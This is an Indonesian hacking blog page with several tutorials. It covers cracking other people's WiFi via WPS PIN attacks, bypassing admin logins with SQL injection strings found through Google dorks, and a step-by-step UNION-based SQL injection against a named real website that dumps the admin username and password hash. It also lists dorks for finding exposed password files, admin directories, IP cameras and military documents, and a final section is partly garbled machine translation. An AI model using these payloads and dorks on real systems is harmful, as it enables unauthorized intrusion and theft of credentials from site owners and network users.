Tuesday 21 May 2019

Cara Melihat Kata sandi WiFi menggunakan Aplikasi Android

,
Ketika kuota internet kamu habis dan kebetulan di tempat kamu ada WiFi, tapi WiFi tersebut terkunci atau mempunyai password sehingga kita ga bisa mengakses WiFi tersebut. Tenang, ada beberapa cara yang wajib kalian coba untuk bisa mengakses WiFi tersebut secara cuma-cuma menggunakan aplikasi android yaitu Wps Wpa Tester (salah satu, masih banyak lagi)

Caranya cukup mudah, kamu hanya perlu download aplikasi tersebut di Google Play Store
Pertama masuk dulu ke Google Play Store, kemudian isi kolom pencarian lalu ketik Wps Wpa Tester dan Download


Cara Menggunakan Aplikasi Tersebut dengan Benar :

  1. Install dan buka Aplikasi nya
  2. Klik "Scan" untuk melihat jaringan WiFi yang tersedia untuk dibobol
  3. Lihat jika ada WiFi yang menggunakan WPS maka WiFi tersebut berwarna hijau (Bisa dibobol) jika tidak maka akan berwarna merah berarti menandakan WiFi tersebut tidak bisa dibobol
  4. Kemudian kamu akan melihat beberapa PIN guna untuk pembobolan, jika kamu ingin menggunakan semua PIN secara otomatis maka pilih Automatic PIN
  5. Tunggu proses hingga selesai, jika berhasil kamu akan melihat password WiFi yang kamu targetkan
  6. Selesai, gunakan dengan bijak.

Wednesday 15 May 2019

Bypass Admin Login Untuk Mengakses Situs Sebagai Administrator

,
Sebelum kita mulai tutorial bypass Admin lebih baik mengetahui apa dan kenapa penyebab terjadinya bypass admin pada sebuah situs. Singkatnya situs dapat di bypass halaman admin login tersebut dikarenakan situs tersebut memiliki bug yang bernama SQL Injection. Bug ini pernah saya posting tetapi dengan dimana attacker menggunakan cara/konsep yang berbeda memanfaatkan bug tersebut. Untuk selebih nya silahkan baca penjelasan mengenai SQL Injection di bawah ini :


#Penjelasan SQL Injection#
Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia).
Nah, Bypass Admin itu sendiri merupakan salah satu contoh dari bug SQL Injection, Di mana attacker memanfaatkan celah tersebut dengan cara mengisi sebuah form login yang kita injeksi menggunakan cheat sheet maka halaman administrator sebuah website dapat kita akses

Jika sudah membaca penjelasan tentang SQL Injection maka langsung saja kita kepertanyaannya, bagaimana sih caranya bypass Admin Login tersebut? ini caranya.
  1. Internet + Browser (Chrome direkomendasikan)
  2. Google Dorking untuk mencari Website Halaman Admin Login
  3. Username dan Password (Cheat Sheet)
#Google Dork#
  • inurl:manager intitle:Admin Panel
  • inurl:/admin2/ ext:php inurk:/admin/ ext:php
  • inurl:/adminpanel/ ext:php
  • inurl:/admin_panel/
  • inurl:/login.php
  • inurl:/admin.php
  • inurl:/admin
  • inurl:/login.html
  • dan Kreasikam Lagi
Asumsikan jika kita sudah mendapatkan website untuk di bypass, misal http://target.com/
Jangan lupa untuk menuju halaman Admin Login tersebut, misal folder directory Admin Login situs tersebut adalah "admin" maka kita menuju url tersebut yaitu http://target.com/admin/
(Tidak semua nama folder directory Admin Login itu sama pada sebuah situs)
Contoh gambar 1

Pada form username dan password kita isi dengan:
Username : ' OR 1=1--
Password : ' OR 1=1--

Lalu Login/Enter
Contoh gambar 2

Jika berhasil maka anda akan menuju Dashboard Halaman Admin tersebut login sebagai Administrator.
Contoh gambar 3
Nah gambar yang di atas adalah merupakan hasil dari bypass Admin tersebut.

Sebenarnya ada banyak sekali Cheat Sheet untuk mengisi username dan password Admin Login, tidak hanya itu saja. Kadang ada beberapa situs yang tidak terinjeksi menggunakan ' OR 1=1-- atau sebaliknya

Jadi jika username/password tidak berhasil saya rekomendasikan untuk menggunakan yang lain, diantaranya yaitu:



  • ' or 1=1 limit 1 -- -+
  • admin' #
  • admin@email.com' or 1=1 limit 1 -- -+



  • Di atas ini adalah yang paling saya rekomendasikan karena sudah sering saya gunakan berulang kali, tapi jika ingin menggunakan yang lain bisa mencari di google.

    Akhirnya selesai juga Tutorial Bypass Halaman Admin Login yang saya buat, semoga bermanfaat untuk kalian semua. Harap agar menggunakan celah tersebut dengan bijak, semoga tidak disalahgunakan karena ini hanya untuk mengingatkan kita bersama-sama betapa pentingnya keamanan sebuah situs. Terima Kasih

    Catatan : Tidak semua Admin Login dapat diinjeksi/bypass, karena belum tentu situs tersebut memiliki bug SQL Injection.

    Tuesday 12 November 2013

    Memanipulasi Wp-Config di Wordpress

    ,
    Oke , saya akan bagi bagi tutorial lagi nih :D

    Langsung Tkp :

    1. Buat Folder bernama misalkan homo .
    2. Jika sudah copykan wp-config kalian ke folder homo kemudian rename menjadi gay.php
    3. Kemudian buka dulu di address , saya disini mengetes di localhost, jadi :
    • http://localhost/wordpress/homo/gay.php
    4. Kemudian liat disana muncul error , seperti ini :
    • Warning: require_once(C:\xampp\htdocs\wordpress\homo/wp-settings.php) [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

      Fatal error: require_once() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress\homo/wp-settings.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

    Lihat Kata ini : 
    • C:\xampp\htdocs\wordpress\homo\gay.php on line 90
    Buka gay.php melalui notepad++ dan lihat di Line 90.
    Kalian rubah require_once(ABSPATH . 'wp-settings.php'); menjadi require_once(ABSPATH . '../wp-settings.php');

    5. Refresh, dan Lihat terdapat error lagi, layaknya :
    • Warning: require(C:\xampp\htdocs\wordpress\homo/wp-includes/load.php) [function.require]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\wp-settings.php on line 21

      Fatal error: require() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress\homo/wp-includes/load.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\wp-settings.php on line 21
       
    Kalian Copy semua File wp-includes or Copy langsung saja dirnya ke dir homo.

    6. Refresh kembali, dan ternyata blank. Semua dir homo kalian atur sendiri untuk mengamankannya

    Belum selsai, kalian manipulasi dulu wp-config yang ada di home kalian , layaknya seperti ini saya manipulasi:
    • <?php
      /**
      * The base configurations of the WordPress.
      *
      * This file has the following configurations: MySQL settings, Table Prefix,
      * Secret Keys, WordPress Language, and ABSPATH. You can find more information
      * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
      * wp-config.php} Codex page. You can get the MySQL settings from your web host.
      *
      * This file is used by the wp-config.php creation script during the
      * installation. You don't have to use the web site, you can just copy this file
      * to "wp-config.php" and fill in the values.
      *
      * @package WordPress
      */

      // ** MySQL settings - You can get this info from your web host ** //
      /** The name of the database for WordPress */
      define('DB_NAME', 'si_homo');

      /** MySQL database username */
      define('DB_USER', 'homo_kao');

      /** MySQL database password */
      define('DB_PASSWORD', 'gay_dasar_loe');

      /** MySQL hostname */
      define('DB_HOST', 'localhost');

      /** Database Charset to use in creating database tables. */
      define('DB_CHARSET', 'utf8');

      /** The Database Collate type. Don't change this if in doubt. */
      define('DB_COLLATE', '');

      /**#@+
      * Authentication Unique Keys and Salts.
      *
      * Change these to different unique phrases!
      * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
      * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
      *
      * @since 2.6.0
      */
      define('AUTH_KEY',         'c3lVn iu`j#*x_nX9K1N*X)%#Mj;UPZ+@Ty/M/f8 3Y~c{Aa%Yl]uD]&/|H*..i4');
      define('SECURE_AUTH_KEY',  'Y<dauHGa6X?Ln*+_^_Q9}2apqf=+q+L0$KuS0?x;~ RI,-sTqQh^_M8$wmo@#[S-');
      define('LOGGED_IN_KEY',    'ccrz>RKwh:n%.X%R32y2rgPY|y)3.Md(J.}p!o}<>sLeJ9oREEG2HSXO]4z5:Ygg');
      define('NONCE_KEY',        'g(V<~wN{Tr_A^@K)tr)wkh-Lu~4[lQmY>D<P|>=[H#X,1ll!$J~YBsl$Id[Rg&%]');
      define('AUTH_SALT',        'yRYaDcOM5m)el$U,6(:/3@~j}%`bQ?fC mwZE1$XM3:PSXv+Tv@{Q;)A6c-DrHl ');
      define('SECURE_AUTH_SALT', 'W.*K>:H.1&q<*dW5jNo+~K}+vQqpp&u_tuL!voXXl~gc[.T<Ff9JK;Dp-b4ng^&|');
      define('LOGGED_IN_SALT',   '}@mJlO,SO~%T?.~R>!=t_u:T_^0lp4Qy, b_}(D:os>v2uEyhRPxL-D?&TQk21]+');
      define('NONCE_SALT',       ';99){buN>>{lslBg-1Pm&r&g?N/O_;R7C0u_EXBtuxYfzBFs38YPSG#S>VU,SL5E');

      /**#@-*/

      /**
      * WordPress Database Table prefix.
      *
      * You can have multiple installations in one database if you give each a unique
      * prefix. Only numbers, letters, and underscores please!
      */
      $table_prefix  = 'drom_';

      /**
      * WordPress Localized Language, defaults to English.
      *
      * Change this to localize WordPress. A corresponding MO file for the chosen
      * language must be installed to wp-content/languages. For example, install
      * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
      * language support.
      */
      define('WPLANG', '');

      /**
      * For developers: WordPress debugging mode.
      *
      * Change this to true to enable the display of notices during development.
      * It is strongly recommended that plugin and theme developers use WP_DEBUG
      * in their development environments.
      */
      define('WP_DEBUG', false);

      /* That's all, stop editing! Happy blogging. */

      /** Absolute path to the WordPress directory. */
      if ( !defined('ABSPATH') )
          define('ABSPATH', dirname(__FILE__) . '/');

      /** Sets up WordPress vars and included files. */
      require_once(ABSPATH . 'wp-settings.php');
    Kemudian Save.

    7. Refresh, dan lihat , jika terjadi error seperti ini :
    Error establishing a database connection
    hmm,, belum terkoneksi. tenang kalian buka File wp-load.php di notepad ++, kemudian lihat :

    - Line 26 : ada wp-config.php rubah menjadi homo/gay.php
    - Line 29 : ada wp-config.php rubah menjadi homo/gay.php
    - Line 31 : ada wp-config.php rubah menjadi homo/gay.php
    - Line 34 : ada wp-config.php rubah menjadi homo/gay.php

    Kemudian Save , dan lihat hasilnya.
    Wew masih error, layaknya :
    • Warning: require_once(C:\xampp\htdocs\wordpress/../wp-settings.php) [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

      Fatal error: require_once() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress/../wp-settings.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\homo\gay.php on line 90
      Kalian buka file gay.php kemudian ke Line 90 , rubah require_once(ABSPATH . '../wp-settings.php'); menjadi require_once(ABSPATH . './wp-settings.php');
      Kemudian Save, dan Lihat hasilnya.
      dan ternyata berhasil normal kembali, dan jika ada yang symlink. hmmm pasti dia homo .. Wkwkwkwk

      Content editor : Muhammad Taregh Azzis
      Sumber : Hacker Newbie (Syndrom2211)
      Syndrom2211

      Belajar SQLI Manual

      ,
      Oke saya akan memberikan Tutorial tentang SQLI Secara Manual .
      Siapkan Google Dork terlebih dahulu.
      Oke , saya sudah mempersiapkan Google Dorknya untuk Anda
      1. inurl:index.php?id=
      2. inurl:article.php?ID=
      3. inurl:games.php?id=
      4. inurl:newsDetail.php?id=
      5. inurl:gallery.php?id=
      6. inurl:products-details.php?cid=
      Saya menggunakan dork inurl:products-details.php?cid= dan saya sudah mendapatkan target untuk sebagai bahan percobaan , ini dia targetnya http://www.speedwerx.com.au/products-details.php?cid=&pid=12
      Untuk mengecek website itu mempunyai bug atau tidak dengan cara memasukan ( ' )
      Contohnya : http://www.speedwerx.com.au/products-details.php?cid=&pid=12' 
      Ternyata website itu mempunyai BUG , muncul pesan error seperti ini :
      You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND f.id = a.user_id' at line 3

      Tapi untuk target kali ini tidak muncul pesan tersebut .

      Setelah kita menemukan error tadi, langkah selanjutnya kita harus mencari columnnya.
      Gunakan perintah "+order+by+1--"
      contoh : http://www.speedwerx.com.au/products-details.php?cid=&pid=12+order+by+1--

      Pertama kita mulai dengan angka 1 , dan seterusnya sampai kita menemukan error lagi
      http://www.speedwerx.com.au/products-details.php?cid=&pid=12+order+by+8--

      Pada angka 8 , muncul pesan error : "Invalid SQL: SELECT * FROM article WHERE id = 12 order by 8-- AND status = 1
      MySQL Error: 1054 (Unknown column '8' in 'order clause')
      Session halted."


      Jadi angka yang diambil adalah 8-1 = 7 , berarti jumlah column yang kita ambil adalah 7. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union+all+select]
      Contoh :
      http://www.speedwerx.com.au/products-details.php?cid=&pid=-12 union all select 1,2,3,4,5,6,7--

      Tambahkan tanda ( - ) didepan angka cid , jadi seperti ini -12

      Misalnya muncul "angka ajaib" : 1 atau 2 atau 3. Kita pilih salah satunya saja. Kebetulan pada target tersebut munculnya angka 4 saja.


      Selanjutnya kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 4 (Angka Ajaib)
      Contoh :
      http://www.speedwerx.com.au/products-details.php?cid=&pid=-12 union all select 1,2,3,version(),5,6,7--

      Waahh , muncul tulisan berikut : 5.5.32-31.0 (Versi Database MySQL)

      ternyata versi 5, versi 5 lebih mudah. Kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.
      Selanjutnya kita akan mencari table-nya dengan perintah [group_concat(table_name)] pada salah satu angka ajaib. Dan tambahkan [+from+information_schema.tables+where+table_schema=database()--] di belakang angka 12
      Nah ini contohnya :

      Akan muncul nama-nama tablenya :
      tbl_accesslevels,tbl_admin,tbl_category,tbl_country,tbl_image,(masih banyak lagi)

      Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password admin, kita ambil tbl_admin
      sebelumnya kata "tbl_admin" tersebut kita convert dulu ke HEXA agar dapat dibaca oleh SQL di sini : http://snarkles.net/scripts/sneak/sneak.php

      Hasilnya : 74626c5f61646d696e

      Perintah selanjutnya adalah [group_concat(column_name)] pada angka ajaib dan [+from+information_schema.columns+where+table_name=0xHEXA--] di akhir URL.
      Ganti HEXA dengan hasil convert tadi yaitu : 74626c5f61646d696e tambahkan 0x didepan HEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA
      Seperti ini :
      http://www.speedwerx.com.au/products-details.php?cid=&pid=-12 union all select 1,2,3,group_concat(column_name),5,6,7 from information_schema.columns where table_name=0x74626c5f61646d696e--

      Taraa,muncul column :
      id,username,password

      Untuk melihat isi dari column tersebut gunakan perintah [group_concat(column5,0x3a,column6)] pada angka ajaib 5 dan [+from+NAMATABLE--] pada akhir URL.
      Ganti column5 dengan "username" dan column6 dengan "password" 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke HEXA. NAMA TABLE diganti dengan "tbl_admin" untuk mengambil informasi dari table yang bernama "tbl_admin"
      Seperti ini :
      http://www.speedwerx.com.au/products-details.php?cid=&pid=-12 union all select 1,2,3,group_concat(username,0x3a,password),5,6,7 from tbl_admin--

      We O We :D , Dapat hasilnya yaitu : admin:64eeb794076e6f2ba7436430ca09d157

      Password tersebut masih berbentuk hash dan harus di decrypt dulu. Kita bisa decrypt di http://md5decrypter.co.uk


      Content editor : Muhammad Taregh Azzis
      Sumber : http://cahmuncar.blogspot.com/2013/05/tutorial-sql-injection-secara-manual.html

      Friday 26 July 2013

      Tips Mesin Pencari Lewat Google

      ,
      sedikit berbagi :)
      Premise: English Google → www.google.com

      Pertama

      Pada kotak pencarian, masukkan: "indexOf /" inurl: lib

      Anda kemudian akan mencari akses ke berbagai perpustakaan, dan akan dapat men-download buku-buku favorit mereka.

      Pada kotak pencarian, masukkan: "indexOf /" CNKI

      Tekan pencari Anda dapat menemukan banyak perpustakaan CNKI, VIP, dll Superstar masuk!

      Pada kotak pencarian, masukkan: "indexOf /" ppt

      Anda kemudian dapat mencari terobosan web download portal powerpint bekerja!

      Pada kotak pencarian, masukkan: "indexOf /" mp3

      Anda kemudian dapat mencari terobosan web Portal download mp3, rm dan karya video lainnya!

      Pada kotak pencarian, masukkan: "indexOf /" swf

      Anda kemudian dapat mencari terobosan web download portal kilat bekerja!

      Pada kotak pencarian, masukkan: "indexOf /" nama software yang ingin Anda download

      Anda kemudian dapat mencari terobosan web download portal software!

      Perhatikan bahwa tanda kutip harus dalam bahasa Inggris!

      Lebih lanjut mengungkapkan bahwa, jika Anda masukkan:

      "IndexOf /" AVI

      Mengisi lain kedua

      Untuk melihat dunia dengan Google! Long sebagai Anda memasukkan kata kunci khusus GOOGLE, Anda dapat mencari ribuan alamat IP Kamera! Melalui dia Anda dapat melihat gambar real-time!

      Di google, masukkan

      inurl: "? modus viewerframe ="

      Hanya membuka satu, kemudian ikuti petunjuk untuk menginstal plug-in, Anda dapat melihat!

      Dilengkapi pada ketiga

      Tiga hacker Tentang Google Tips Pencarian

      Seperti kita semua tahu, Google tidak diragukan lagi mesin pencari paling kuat di dunia. Namun, di tangan hacker, juga merupakan senjata rahasia, Anda dapat mencari beberapa informasi yang tak terduga. CCID Editor mereka ringkasan singkat tidak ingin Anda untuk menggunakan dia untuk menyerang situs orang lain, tetapi untuk menggunakan keterampilan ini untuk jaringan yang luas dari informasi, untuk jarum di tumpukan jerami, untuk mencari informasi yang berguna untuk Anda.

      Jika Anda adalah seorang pengguna internet biasa, Anda dapat menggunakan teknik-teknik hacking untuk memperluas wawasan mereka dan meningkatkan efisiensi pencarian mereka, Jika Anda Webmaster, Anda dengan cepat melihat apakah situs Anda jauh di bawah deteksi hacker berarti untuk tindakan pencegahan, jika tidak cepat datang untuk memperbaiki situasi, setelah semua, lebih baik dari api tersembunyi, mencegah lebih baik daripada bantuan bencana; Jika Anda seorang hacker, saya percaya Anda kembali ke situs hacker terlihat pada metode yang serupa lainnya, artikel ini untuk Anda bukan tips yang berguna untuk Anda di sini adalah seorang dokter anak, kelas rookie! Anda dapat menghemat waktu berharga untuk melakukan hal-hal yang lebih bermakna, Anda tidak membaca artikel ini, pergi ke tempat lain!

      Berdasarkan pertimbangan di atas saya disusun dan didistribusikan artikel ini.

      Cari URL

      Sebagai contoh, kita mengirimkan formulir ini: passwd.txtsite: virtualave.net

      Untuk melihat apa? Bukankah itu menakjubkan! Ada banyak didasarkan pada CGI / PHP / ASP jenis papan pesan memiliki masalah ini. Kadang-kadang kita bahkan mendapatkan password atau teks yang jelas! Mungkin terlalu banyak tidak bertanggung jawab administrator, mungkin kesadaran keamanan yang buruk, jika Anda seorang administrator jaringan, cepat memeriksa Jangan biarkan penyerang berbahaya dijemput murah. Jangan terlalu yakin enkripsi DES, bahkan jika password kita adalah DES password terenkripsi, hacker masih bisa melalui banyak perangkat lunak retak.

      Kali ini kita bisa mendapatkan file yang berisi password. "Site: virtualave.net" berarti pencarian hanya virutalave.net 's URL. virutalave.net adalah penyedia server jaringan.

      Demikian pula, kita dapat mencari jumlah domain tingkat atas, seperti:. Net.org.jp.in.gr

      config.txtsite:. jp

      admin.txtsite:. tw

      Direktori Home

      Rumah sangat berguna, itu akan memberi Anda banyak informasi yang berguna.

      Kami menyerahkan formulir berikut:

      "IndexOf / admin"

      "IndexOf / rahasia"

      "IndexOf / cgi-bin" site:. Edu

      Anda dapat menentukan pencarian karakter situs Anda sendiri. Jadi Anda mendapatkan banyak informasi.

      Pencarian untuk jenis file tertentu

      Misalnya, Anda ingin menentukan jenis file, Anda dapat mengirimkan formulir berikut:

      filetype:. docsite:. milclassified

      Ini adalah mencari informasi militer, dan Anda dapat menyesuaikan pencarian.

      Lagi menyediakan keempat

      Fitur khusus Google

      1, nomor telepon penyelidikan

      Google bar pencarian, penambahan terbaru untuk nomor telepon dan alamat jalan dari informasi permintaan Amerika Serikat.

      Jika Anda ingin mencari daftar orang-orang ini, hanya mengisi nama, kota dan provinsi.

      Jika informasi ini diketahui semua orang, Anda akan berada di bagian atas halaman hasil pencarian untuk melihat pencarian alamat telepon dan jalan

      Anda juga dapat menemukan daftar metode berikut:

      Nama (atau pertama dalam huruf kapital), nama belakang, kode area telepon

      Nama (atau pertama dalam huruf kapital), nama belakang, kode pos

      Nama (atau pertama dalam huruf kapital), nama belakang, kota (negara dapat ditulis)

      Nama (atau pertama dalam huruf kapital), nama belakang, negara,

      Nomor telepon, termasuk kode area

      Nama, kota, negara

      Nama, kode pos

      2, menemukan file PDF

      Hasil pencarian GOOGLE sekarang termasuk file PDF. Meskipun file PDF sebagai file HTML begitu banyak, tetapi mereka sering memiliki sejumlah dokumen lain tidak memiliki informasi berkualitas tinggi

      Dalam rangka untuk menampilkan hasil pencarian file PDF, bukan halaman web, file PDF dimulai dengan sebuah header dalam teks biru.

      Hal ini untuk membiarkan Anda tahu program ACRTOBATREADER akan mulai membaca dokumen

      Jika komputer Anda tidak dilengkapi dengan program ini, komputer akan dapat memandu Anda untuk men-download gratis situs web program.

      Menggunakan file PDF, halaman terkait snapshot dengan "TEXTVERSION" tempat, yang merupakan salinan dari file dokumen PDF, yang menghilangkan semua perintah format.

      Jika Anda tidak ingin melihat link PDF dalam serangkaian kasus hasil pencarian, asalkan bar pencarian ditandai-inurldf menambahkan kriteria pencarian Anda.

      3, harga saham,

      Gunakan Google untuk mencari saham dan informasi reksa dana, cukup masukkan satu atau lebih dari NYSE, NASDAQ, AMEX, atau

      Reksadana kode ticker, Anda dapat memasukkan nama perusahaan untuk membuka rekening di pasar saham.

      Jika Google mengakui stok permintaan Anda atau reksa dana yang respon akan langsung dihubungkan ke penyedia informasi keuangan berkualitas tinggi saham dan informasi reksa dana.

      Pada awal pencarian Anda menunjukkan hasil adalah bahwa Anda memeriksa kode saham ticker. Jika Anda ingin mencari nama perusahaan (misalnya, INTEL), silakan lihat "harga saham" dalam hasil pencarian Google akan memiliki kolom keuangan yang menghubungkan halaman rumah perusahaan (COM misalnya, www. INTEL.).

      Google adalah kualitas untuk memilih dan memutuskan atas dasar penyedia informasi keuangan, termasuk faktor kecepatan download, user interface dan fitur-fiturnya.

      4, lihat siapa Anda link

      Beberapa kata-kata dengan titik dua akan memiliki arti khusus. Untuk link contoh: operator. Permintaan link: SITEURL, ia akan menampilkan semuanya menunjuk ke URL tersebut. Sebagai contoh, link www. Google. Com akan menampilkan semua menunjuk halaman rumah GOOGLE. Namun, metode ini tidak dapat digunakan dalam hubungannya dengan kata kunci pencarian.

      5, cari situs

      Jika terhubung ke usus besar setelah situs kata akan dapat membatasi pencarian Anda ke situs tertentu. Khususnya: Gunakan bar pencarian di situs c: sampledomain.com struktur gramatikal. Sebagai contoh, di Stanford mencari informasi, masukkan:

      . stanford edu www: admissionsite.

      6, cari kamus parafrase

      Pendekatan parafrase Cari kamus di kolom pencarian yang ingin Anda cari. Atas permintaan kita menemukan semua parafrase kamus akan ditandai dengan garis bawah di bagian atas hasil pencarian, klik pada link Anda akan menemukan penyedia kamus berdasarkan persyaratan definisi yang relevan diberikan. 7, dengan Goolge menemukan peta

      Ingin menggunakan Google untuk menemukan peta jalan, bar pencarian Google, masukkan alamat jalan AS, termasuk kode pos atau kota / negara (misalnya 165 University Avenue PALOALTOCA). Biasanya, alamat jalan dan nama kota akan cukup.

      Ketika Google mengenali kebutuhan Anda adalah untuk menemukan peta, akan memberikan umpan balik untuk menyediakan peta berkualitas tinggi menyediakan link sehingga Anda peta langsung. Kami adalah seleksi berbasis kualitas penyedia peta. Perlu dicatat bahwa penyedia informasi Google dan peta tidak menggunakan asosiasi
       
      Posted by Saya
      Article by Index Php 
       

      FurutaWashuu Blog Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger Templates